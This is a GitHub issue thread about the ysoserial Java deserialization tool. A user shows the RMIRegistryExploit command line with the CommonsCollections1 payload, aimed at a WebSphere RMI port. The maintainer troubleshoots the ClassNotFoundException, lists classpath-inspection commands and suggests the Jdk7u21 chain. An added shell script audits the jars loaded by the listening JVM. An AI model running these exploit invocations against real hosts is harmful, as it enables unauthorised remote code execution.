No security manager: RMI class loader disabled #40

Closed
BobPeterson opened this issue Apr 18, 2016 · 4 comments

@BobPeterson

First of all, thanks for your work, it's awesome.

I'm testing a host that uses the RMI protocol on port 22099. I could connect to it using the "jconsole" tool. However, using ysoserial, I get the following stacktrace.

  • Command:

java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit <ip> 22099 CommonsCollections1 "/sbin/ifconfig"

I have tried many different payloads to be sure and different CommonsCollections but the problem is still present.

  • Stacktrace:

java.rmi.ServerException: RemoteException occurred in server thread; nested exception is: 
    java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is: 
    java.lang.ClassNotFoundException: org.apache.commons.collections.map.LazyMap (no security manager: RMI class loader disabled)
    at sun.rmi.server.UnicastServerRef.oldDispatch(UnicastServerRef.java:400)
    at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:255)
    at sun.rmi.transport.Transport$1.run(Transport.java:168)
    at java.security.AccessController.doPrivileged(AccessController.java:279)
    at sun.rmi.transport.Transport.serviceCall(Transport.java:164)
    at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:506)
    at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.handleRequest(TCPTransport.java:838)
    at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:912)
    at java.lang.Thread.run(Thread.java:810)
        .......

The application server installed on the remote host is WebSphere. The RMI protocol uses serialized data, so I think it has to be vulnerable to Apache Commons vulnerabilities.

Thanks for your help, I will have access to this host until thursday.

@frohoff
Owner

frohoff commented Apr 18, 2016

It sounds like the classes required by the CommonsCollections1 chain (or others) are probably not on the classpath in this case.

A decent way to investigate, assuming you have console access on this host, is to get the full classpath of that JVM/process: figure out which process is listening on that port (i.e. netstat -nlp | grep 22099), then check the full command line for -cp -classpath params (i.e. ps aux | grep $pid), and if necessary, see what files the process has open (i.e. lsof -p $pid | grep jar).

Unfortunately the above will only tell you what the entire collective process has loaded, and not what the specific child ClassLoader in question has loaded, which can be different. RMI Registries generally inherit the ClassLoader of the code that creates them with a call to LocateRegistry.createRegistry(int).

Do you know what Java version is being used? Have you tried the Jdk7u21 chain?

In the future I'd suggest asking questions like this in the Gitter chat. I'll probably close this shortly.

-Chris
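
The netstat / command-line / lsof walk-through from the comment above, as an added shell example that is not part of the thread or of ysoserial: it reports which jars visible to the JVM listening on a port contain a given class, such as the one named in the ClassNotFoundException. The function names are this example's own, and it assumes Linux, reading /proc/$pid/cmdline in place of `ps aux` so arguments stay separated.

```shell
#!/bin/sh
# Added example (not from the thread): helpers for the netstat / ps / lsof
# walk-through. Function names are this example's own; run as root on the host.

# stdin: `netstat -nlp` output; $1: TCP port. Prints the PID of the listener.
pid_for_port() {
  awk -v port="$1" '$1 ~ /^tcp/ && $4 ~ (":" port "$") && $7 ~ /^[0-9]+\// {
    split($7, a, "/"); print a[1]; exit }'
}

# stdin: JVM arguments, one per line (e.g. tr "\0" "\n" < /proc/$pid/cmdline).
# Prints each entry that follows -cp / -classpath, one per line.
classpath_entries() {
  awk 'take { n = split($0, e, ":"); for (i = 1; i <= n; i++) if (e[i] != "") print e[i]
              take = 0; next }
       $0 == "-cp" || $0 == "-classpath" { take = 1 }'
}

# stdin: `lsof -p $pid` output. Prints the distinct open .jar files.
open_jars() { awk '$NF ~ /\.jar$/ { print $NF }' | sort -u; }

# $1: jar path; $2: class name in dotted form. True if the jar contains it.
jar_has_class() {
  unzip -l "$1" 2>/dev/null | grep -q "$(printf '%s' "$2" | tr . /)\.class\$"
}

# $1: port; $2: class to look for. Lists jars of the listening JVM that hold it.
audit_port() {
  pid=$(netstat -nlp 2>/dev/null | pid_for_port "$1")
  [ -n "$pid" ] || { echo "no listener found on port $1" >&2; return 1; }
  { tr '\0' '\n' < "/proc/$pid/cmdline" | classpath_entries
    lsof -p "$pid" 2>/dev/null | open_jars; } | sort -u |
  while read -r jar; do
    if [ -f "$jar" ] && jar_has_class "$jar" "$2"; then echo "pid $pid: $jar"; fi
  done
}

# This is the whole-process view; a child ClassLoader may see fewer classes.
if [ "$#" -eq 2 ]; then audit_port "$1" "$2"; fi
```

Invoked as `sh audit.sh 22099 org.apache.commons.collections.map.LazyMap` (the script name is hypothetical), an empty result means no jar on the process-wide classpath carries that class.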

@frohoff
Owner

frohoff commented Apr 19, 2016

Closing. Please follow up in the Gitter chat if there are further questions.

@frohoff frohoff closed this as completed Apr 19, 2016
@sevck

sevck commented Nov 14, 2017

I have also encountered this problem and want to know how the poster above solved it.

@sevck

sevck commented Nov 15, 2017

7u21
